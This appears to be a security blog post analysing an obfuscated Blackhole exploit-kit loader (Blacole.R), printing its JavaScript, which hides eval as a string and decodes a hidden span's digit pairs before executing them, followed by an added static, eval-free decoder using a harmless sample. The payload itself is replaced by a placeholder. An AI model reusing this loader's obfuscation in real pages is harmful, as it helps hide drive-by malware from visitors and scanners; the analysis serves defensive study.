Interesting malicious script #3

This is the newest variant of Blackhole, labeled by MS as Blacole.R. It is still surprising to see the Blackhole signature upgraded through nearly a dozen versions in a month or two.

I've replaced the payload in <span></span> as it is very large.

Eval itself is turned into a string, and I think they can even play more tricks to hide the string eval.

<html><title>ev</title><body><input type="input" name="KVhMSfMk" value="length" style="display:none"><span style="visibility:hidden">
<span>"Large Malicious Payload"</span></span><script>
riJdw0= this["document"];
Wm6aTby4="innerHTML";
Jws9z=window;
riJdw0.tAinU7TY= function(hy){ return riJdw0.getElementsByName(hy);};
riJdw0.PgOrtKo= function(hy){ return riJdw0.getElementsByTagName(hy);};

MCchJo=riJdw0.tAinU7TY("KVhMSfMk")[0]["va"+"lue"];

vjhac2P= new Function("x,y,z","return x.replace(y,z)");
BMEIlPB= new Function("x,y,z","return x.substr(y,z)");


M21Sq=vjhac2P("","", new Object("eval"));

jKSwJN = Jws9z[M21Sq](M21Sq);

dqCjX=riJdw0.PgOrtKo("span")[1][Wm6aTby4];
SloAR = "pN#QWy,^Kri['HEBe=k ctAbZsO4Dg&X@US9VzT7Rq/>fwI*$Jn6_vxC;\\L5Y+d(:1].aoh<l-8!P23?0)GjMm\"|uF{%}";
PCvwO="";
NxJdPAs=dqCjX[MCchJo];
Po7tS43=0;
while(Po7tS43<NxJdPAs){
Ub4phW=BMEIlPB(dqCjX,Po7tS43+(124*0),44/22)*(45*2/90);
PCvwO=PCvwO["concat"](BMEIlPB(SloAR,jKSwJN("Ub4phW"),1));
Po7tS43=2+Po7tS43;
}
jKSwJN(PCvwO);

</script></body></html> 
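
The loader above rebuilds its script by reading the second span's text two decimal digits at a time and using each pair as an index into the SloAR string, then hands the result to eval. The following is an added example, not part of the original post: it does the same decoding statically, without eval, so the decoded text can be read instead of run. The function names, the sample page and its harmless payload are constructed for this example.

```javascript
// Added example (not from the original post): decode the digit-pair payload
// statically. Nothing here calls eval; decoded text is returned for review only.

// Substitution alphabet copied verbatim from the sample's SloAR variable.
const ALPHABET = "pN#QWy,^Kri['HEBe=k ctAbZsO4Dg&X@US9VzT7Rq/>fwI*$Jn6_vxC;\\L5Y+d(:1].aoh<l-8!P23?0)GjMm\"|uF{%}";

// The loader reads getElementsByTagName("span")[1].innerHTML, i.e. the text of
// the second <span> in document order. Approximate that without a DOM.
function extractSecondSpan(html) {
  const opens = [...html.matchAll(/<span\b[^>]*>/gi)];
  if (opens.length < 2) return null;
  const start = opens[1].index + opens[1][0].length;
  const end = html.indexOf("</span>", start);
  return end === -1 ? null : html.slice(start, end);
}

// Each pair of decimal digits is an index into the alphabet. Pairs that are not
// two digits, or that point past the alphabet, are recorded instead of guessed.
function decodePayload(encoded, alphabet = ALPHABET) {
  const chars = [];
  const anomalies = [];
  for (let i = 0; i < encoded.length; i += 2) {
    const pair = encoded.slice(i, i + 2);
    const idx = /^\d\d$/.test(pair) ? Number(pair) : -1;
    if (idx < 0 || idx >= alphabet.length) {
      anomalies.push({ offset: i, pair });
      continue;
    }
    chars.push(alphabet[idx]);
  }
  return { text: chars.join(""), anomalies };
}

// Constructed sample page: same span layout as the post, with a harmless
// payload that decodes to the text "var x = 1;".
const SAMPLE_HTML =
  '<html><body><span style="visibility:hidden">' +
  '<span>53680919541917196556</span></span></body></html>';

function analyzeSample(html = SAMPLE_HTML) {
  const encoded = extractSecondSpan(html);
  return encoded === null ? null : decodePayload(encoded);
}

console.log(analyzeSample());
```

A non-empty anomalies list means the extracted text is not a clean run of digit pairs for this alphabet, which usually indicates the wrong span was extracted or the variant uses a different alphabet or pair width.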
